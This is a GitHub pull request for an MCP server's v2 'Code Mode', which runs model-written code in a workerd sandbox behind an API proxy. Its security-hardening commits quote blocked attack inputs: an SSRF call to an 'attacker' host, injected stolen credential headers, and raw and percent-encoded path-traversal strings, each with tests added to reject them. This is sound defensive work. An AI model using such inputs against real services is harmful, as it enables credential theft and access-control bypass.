feat(mcp)!: v2.0.0 — Code Mode (workerd sidecar, 10-tool surface)#11
Draft
pratikbin wants to merge 11 commits into
Draft
feat(mcp)!: v2.0.0 — Code Mode (workerd sidecar, 10-tool surface)#11pratikbin wants to merge 11 commits into
pratikbin wants to merge 11 commits into
Conversation
Stand up the workerd sidecar that backs Code Mode v2: - workerd config (Cap'n Proto): dispatcher worker on :8787, api-proxy worker with private-network globalOutbound, workerLoader binding for Dynamic Worker Loader (experimental flag required). - spec bootstrap: dispatcher fetches /api-docs/openapi.yaml on first request via api-proxy bootstrap mode, resolves $refs and strips description/example fields, caches in module scope. - /run search mode: each call gets a fresh V8 isolate via the worker loader. Isolate imports a generated `host.js` exposing `spec`, `console`, `sleep` (no network, no api in this phase). 5s timeout, 1MB code cap, structured error envelope. - spec-loader is bundled with `bun build` so workerd can embed yaml inline (workerd cannot resolve node_modules). - Go client + Search MCP tool registered alongside existing 94 tools. HealthMonitor goroutine probes /health; main wires /readyz to expose workerd readiness. - bun unit tests for dispatcher + spec-loader; Go unit tests for client + handler; integration test forks real workerd against an httptest backend serving a fixture spec. Backend (autogen-backend-v2) operationId gate landed in feat/openapi-operationids; required for Phase 2 SDK codegen.
- api-proxy: authenticated mode forwards X-Api-Key/Bearer, builds query strings, 12s upstream timeout, structured network/timeout envelopes. - api-sdk-builder: emits ESM module per call from in-memory spec. Generates `api.<group>.<operationId>(args)` keyed by tag, with `api.raw(method, path, opts)` escape hatch. Throws ApiError on 4xx/5xx carrying status + body + path. - host.js: drops `api` export; `wrapMainModule` now declares run(callback) entrypoint that builds api inside the run scope so the RPC stub stays alive (avoids "RPC stub used after being disposed" disposal race). - dispatcher: passes the api callback to entry.run() instead of a separate setApi() RPC. - Go: AuthCtx context plumbing (WithAuthHeaders / AuthFromContext), Execute MCP tool with auth forwarding, registered in server.go. - Tests: bun (api-proxy / host / sdk-builder), go unit (auth + execute forwards auth), integration (execute happy + auth error).
Long-running execute calls auto-upgrade to a job after the 90s sync
window; the model loops pollJob(jobId) until the job completes or hits
the 600s wall cap.
- dispatcher: jobStore (Map keyed by `j_${uuid}`) tracks each execute
isolate. Each /run execute registers a job, races run vs sync window;
if the run finishes inside 90s the response is the terminal envelope,
otherwise it returns {status: 'running', jobId}. /poll blocks up to
another 90s using awaitJobUntil() against the job's waiter set.
- Wall cap: startIsolateRun races against a 600s timer; on expiry the
job is finalised with errorKind: 'timeout'.
- TTL: terminal jobs are evicted 30 min after finishedAt.
- Result cap: 64 KB serialised; oversized payloads return {__truncated,
preview}.
- /health now reports jobsRunning + jobStoreSize.
- Go: Client.Poll + PollJob MCP tool registered in server.go.
- Tests: Go unit (poll happy + jobMissing, handler missing arg).
BREAKING CHANGE: 87 native MCP tools removed. Long-tail API surface is now reachable via search/execute/pollJob (Code Mode v2). Native tools retained (7): GetQuotas, GetSupportedProjectTypes, CheckProjectUniqueName, CreateProject, UploadDeploymentBase64Files, GetDeployment, CancelDeployment Code Mode tools (3): search(code), execute(code), pollJob(jobId) Phase 4 changes: - server.go: trimmed to 7 native + 3 code-mode AddTool calls. Version bumped to 2.0.0. - mcptools/, handlers/: 87 long-tail files deleted (174 total). - token-budget gate: scripts/count-tokens.ts asserts the 10-tool descriptor surface stays under 1500 tokens (currently 476). - Prometheus metrics: codemode_run_duration_seconds (per mode/outcome), codemode_jobs_running, codemode_jobstore_size, codemode_api_call_duration_seconds. Exposed at /metrics in HTTP mode. - HealthMonitor pulls jobsRunning + jobStoreSize from workerd /health and exports them as gauges. - Hardened Dockerfile (distroless/nonroot) + workerd Dockerfile (non-root debian) + k8s/pod-v2.yaml (read-only rootfs, dropped caps, RuntimeDefault seccomp, mcp /readyz + workerd /health probes). - Smoke + soak scripts for staging verification. - docs/runbook-v2.md: ops runbook (health, common failures, rollback, capacity). - README: 85+ → 10 tools; new Code Mode section with example.
api-proxy:
- buildUrl rejects non-relative paths (must start with single '/'),
blocking SSRF / credential exfil via api.raw("GET","https://attacker").
- sanitizeRequestHeaders allowlists user-supplied headers; auth headers
spread last so X-Api-Key/Authorization cannot be overridden by user
code or smuggled by ApiCall.
- sanitizeResponseHeaders allowlists relayed response headers; strips
Set-Cookie and any internal x-* headers before they reach the sandbox.
- await req.json() now wrapped in try/catch — malformed bodies return
400, not 500.
dispatcher:
- Wall-timeout (600s) attempts best-effort dispose of the runaway
worker's RPC entrypoint + worker stub. Comment documents the workerd
limitation: there is no isolate.terminate() yet, so the V8 isolate
continues until the Worker Loader's LRU evicts it. Disposing the stub
ensures any further api-proxy calls from the runaway code surface as
ProxyError instead of being silently delivered.
integration_test:
- startWorkerd cancel() now Wait()s after Kill() and sleeps 100ms so the
fixed loopback port + pid table are released before the next test.
bun tests added: SSRF block, // path block, header override, response
header strip, malformed body. 18/18 pass.
Review item 4 (waiter cleanup deletes wake not resolve) verified
already correct in shipped dispatcher.js:189; plan file had the bug,
implementation transcribed correctly.
Critical:
- Auth was never reaching workerd. Execute() called AuthFromContext but
no middleware populated the ctx. Added AuthFromRequest that reads
mcp.CallToolRequest.Header (matching the native handlers/request.go
pattern) and falls back to AuthFromContext. Added a thin HTTP
middleware (codemodeAuthHeadersMiddleware) that mirrors incoming
X-Api-Key / Authorization into ctx via WithAuthHeaders so AuthFromContext
works as a backup path even on transports that don't surface request
headers on the MCP request struct.
- startIsolateRun now disposes the entry+worker stubs in a finally
block on EVERY call (success, user error, timeout) — not just wall
timeout. Search timeout now also flows through startIsolateRun's
timer instead of an outer Promise.race that left the isolate alive
and undisposed. Prevents CPU-bound user code from accumulating
cached workers.
Warnings:
- Bearer header now forwarded as X-Access-Token to match native client
(helpers/httpclient.go uses X-Access-Token; sending Authorization
Bearer would silently fail on Bearer-authenticated callers).
X-Access-Token added to SAFE_REQUEST_HEADERS allowlist.
- buildUrl now preserves any path prefix on BACKEND_URL. Previously a
BACKEND_URL like "https://host/api" would be stripped to
"https://host/v1/..." for authenticated calls (bootstrap concatenated
raw, masking the bug). Bootstrap path now also routes through
buildUrl so both modes behave the same.
- Pod manifest mounts a ConfigMap at /etc/createos and sets
CREATEOS_MCP_CONFIG so the binary's --config flag honours it. main.go
flag default now reads CREATEOS_MCP_CONFIG. Pod will no longer crash
on startup with "config.yaml not found".
Info:
- host.js wrapMainModule moves `userFn = (${userCode})` inside the
try/catch so syntax errors surface as user-code errors, not infra.
- soak.ts pre-claims work units so TOTAL is never overshot, wraps fetch
in try/catch, and reports succeeded/failed/errored separately.
Tests: 20/20 bun (added X-Access-Token, base-path preservation,
bootstrap prefix), Go auth_test (added AuthFromRequest cases:
X-Api-Key header, Bearer header, ctx fallback), 3/3 integration still
pass.
Critical:
- authMiddleware: any Authorization header containing a space (e.g.
"Basic abc") used to satisfy the gate because the missing-credentials
branch only checked for empty Authorization. Now we parse the header,
require scheme = "Bearer" + non-empty token, reject everything else
with 401.
- api-proxy: removed x-access-token from SAFE_REQUEST_HEADERS allowlist.
It was added when X-Access-Token replaced Authorization for bearer
forwarding, but allowlisting it lets user code inject
headers: {"X-Access-Token": "stolen"} for callers that authenticated
via API key (where buildAuthHeaders never sets X-Access-Token, so the
injected value survives). All credential headers are now populated
exclusively from the trusted authCtx.
Warnings:
- jobStore + isolate concurrency caps. New constants:
MAX_RUNNING_JOBS = 50 (concurrent execute jobs)
MAX_JOB_STORE_TOTAL = 500 (running + finished-but-not-yet-evicted)
MAX_RUNNING_SEARCHES = 50 (concurrent search isolates)
/run returns 429 with errorKind: "capacity" when a limit is hit.
Bounds memory growth and isolate accumulation when CPU-bound user
code runs to wall_timeout (workerd cannot synchronously terminate the
V8 isolate; LRU eviction lags).
- Search path now decrements its in-flight counter in a finally block.
Tests:
- bun: added credential-smuggling test (X-Access-Token, Authorization,
X-Api-Key, Cookie all stripped from user-supplied headers); 21/21
pass.
- go: existing tests still pass; integration 3/3 pass.
Critical: - buildUrl rejects "." and ".." path segments. URL normalisation collapses "/api/../admin" to "/admin", which would let user code escape any BACKEND_URL path prefix and reach unrelated routes (e.g. /admin from a /api-prefixed deployment). Warnings: - jobStore total cap (500) now evicts the oldest finished job (LRU on finishedAt) before falling back to 429. Previously a burst of 500 fast successful executes would 429 every subsequent request for the next 30 minutes, even with zero running jobs. - api-proxy now reads response body once via resp.text() and parses JSON in-process. resp.json() consumes the body, so the previous resp.text() fallback would throw "body already used" if the JSON parse failed mid-stream. - stdio transport now reads CREATEOS_API_KEY / CREATEOS_BEARER env vars when neither request header nor ctx headers are present. AuthFromEnv exposed for tests; AuthFromRequest cascades: request header → ctx → env. Info: - host.js wrapMainModule comment was misleading: a syntax error in userCode fails the dynamic ESM module compile BEFORE run() executes, so the inner try cannot catch it. Comment now describes the real flow, and dispatcher.js startIsolateRun catches SyntaxError out of the loader/run promise chain and reclassifies it as kind=SyntaxError / userCode so the model sees actionable feedback instead of errorKind=infra. Tests: - bun: dot-segment escape (/../admin), middle dot-segment (/v1/foo/../../admin), invalid-JSON-with-json-content-type. 24/24 pass. - go: TestAuthFromRequest_FallsBackToEnv, TestAuthFromEnv_None.
Path traversal via percent-encoded dot-segments still bypassed the BACKEND_URL prefix check. RFC 3986 §3.3 treats "%2e" as identical to ".", so URL normalisation collapsed "/api/%2e%2e/admin" to "/admin" before any request-time check ran. buildUrl now decodeURIComponent()s each path segment before checking for "." / ".." and rejects invalid percent-encoding outright. Tests added: %2e%2e, %2E%2e (mixed case), %2e. (partial), %ZZ (invalid encoding). 28/28 bun pass.
Make Code Mode self-describing so clients/agents discover the pattern
on connect without external docs.
(d) Server name bumped to "CreateOS MCP (Code Mode v2)" — visible in
initialize.serverInfo.name.
(a) Richer tool descriptions for search / execute / pollJob: api shape
(api.<group>.<operationId>, api.raw escape hatch), ApiError
contract (status/body/path), result envelope (sync/async/error),
explicit limits, inline examples.
(e) tools[].Meta = {mode:"code", sandbox:"workerd", version:"v2"} on
each Code Mode tool. Lets orchestrators flag Code Mode tools
programmatically.
(b) Resources (pull-on-demand, zero cost until requested):
code-mode://intro — workflow + auth + sandbox + limits
code-mode://api-shape — api proxy + ApiError contract +
operationId discovery snippet
(c) Prompts:
code-mode/deploy-example — single execute() that deploys + waits,
with pollJob fallback
code-mode/api-discovery — 4 search() snippets that walk you
from keyword to operationId
Token surface: 476 -> 896 tokens, well under the 1500 gate.
count-tokens.ts updated to match shipped descriptions.
The v2 ops runbook lives in internal docs only; not appropriate for the public createos-mcp repo. README v2 section + PR body cover the user-facing surface.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Summary
CreateOS MCP v2.0.0. Collapses 87 long-tail tool definitions into 3 code-mode tools backed by a
workerdV8 sandbox sidecar, while keeping 7 native fast-path tools for hot operations.Tool surface (v2)
The full ~100-endpoint CreateOS API is reachable via
execute. The model writes a single async arrow function that may chain multiple typedapi.<group>.<operationId>(args)calls inside one sandbox boundary. Long-running ops (>90 s) auto-upgrade to a job; the model loopspollJobuntil done. Hard wall cap 600 s.Token cost of the 10-tool descriptor surface: 896 tokens (gated at 1500).
Architecture
Two-process pod:
Comms strictly over loopback. The
api-proxyworker is the only thing in the pod with backend egress.Sandbox guarantees
search/executeruns in a fresh V8 isolate spawned via the workerd Dynamic Worker Loader.fetch. Only thehost.jsESM module exposesspec,api,console,sleep.X-Api-Key,X-Access-Tokenfor bearer) are forwarded by the dispatcher toapi-proxyfrom the trusted MCP request context — user code cannot inject or override them.api.raw(method, path, opts)requires server-relative paths. Absolute URLs, protocol-relative//, and dot-segments (raw or percent-encoded) are rejected to prevent SSRF /BACKEND_URLprefix escape.Set-Cookieand internalx-*headers are stripped before reaching user code.Limits
searchtimeoutexecutesync windowexecutewall capexecutejobssearchisolates__truncated)sleep(ms)capDiscovery surface (for clients)
initialize.serverInfo.name→"CreateOS MCP (Code Mode v2)"tools/list→ 10 tools; the 3 code-mode tools carry_meta = {mode:"code", sandbox:"workerd", version:"v2"}resources/list→code-mode://intro(workflow + auth + sandbox + limits)code-mode://api-shape(typed accessor + ApiError contract + discovery snippet)prompts/list→code-mode/deploy-example(single execute that deploys + waits, with pollJob fallback)code-mode/api-discovery(4 search snippets that walk from keyword to operationId)Cross-repo dependency
This PR depends on autogen-backend-v2#451 (private repo). That PR adds a CI gate asserting every route in the OpenAPI spec carries an
operationId. The MCP sidecar codegens its typed SDK from thoseoperationIds.Soft dependency — operations missing
operationIdfall through toapi.raw(...), so v2 functions even before the backend PR merges. The hard requirement is for the typed surface to be complete in production. MCP v2 must not ship to prod until the backend PR is merged.Backend ops tracker: NodeOps-app/autogen-backend-v2#452 (private).
Breaking changes
search/execute/pollJob.initialize.serverInfo.namechanged from"MCP Server"to"CreateOS MCP (Code Mode v2)".2.0.0.Native tools retained (7)
GetQuotas,GetSupportedProjectTypes,CheckProjectUniqueName,CreateProject,UploadDeploymentBase64Files,GetDeployment,CancelDeployment.Operational
workerdsidecar built fromcodemode/workerd/Dockerfile(oven/bun base, non-root user,--experimentalworkerd flag for the Dynamic Worker Loader).k8s/pod-v2.yaml— two-container pod manifest. MCP container reads config fromCREATEOS_MCP_CONFIGenv (mounted ConfigMap at/etc/createos).mcp /readyz— 200 only when workerd/healthresponds 200.mcp /metrics— Prom:codemode_run_duration_seconds{mode,outcome},codemode_jobs_running,codemode_jobstore_size,codemode_api_call_duration_seconds.WORKERD_URLenv (defaulthttp://127.0.0.1:8787) tells the MCP binary where the sidecar lives.CI
.github/workflows/token-budget.yml—bun scripts/count-tokens.tsasserts the 10-tool descriptor surface stays ≤1500 tokens (currently 896).Test plan
go build ./...cleango test ./codemode/...passes (15 unit tests)bun testincodemode/workerd/passes (28 tests across dispatcher, spec-loader, host, api-proxy, api-sdk-builder)CODEMODE_INTEGRATION=1 go test -tags integrationpasses (3 end-to-end tests, real workerd subprocess, mock backend)bun scripts/count-tokens.ts— 896/1500k8s/pod-v2.yamlFiles
codemode/— Go pkg (client, handler, auth, health, metrics, discovery)codemode/workerd/— workerd config (Cap'n Proto), dispatcher.js, host.js, api-proxy.js, api-sdk-builder.js, spec-loader.js, Dockerfile, bun testsserver.go— registers 7 native + 3 code-mode tools + 2 resources + 2 promptsmain.go— workerd health probe, /readyz, /metrics, codemode auth-header middlewareDockerfile— distroless/static, nonrootk8s/pod-v2.yaml— pod manifestscripts/{count-tokens,smoke,soak}.ts— CI gate + load testsREADME.md— Code Mode section + 10-tool surface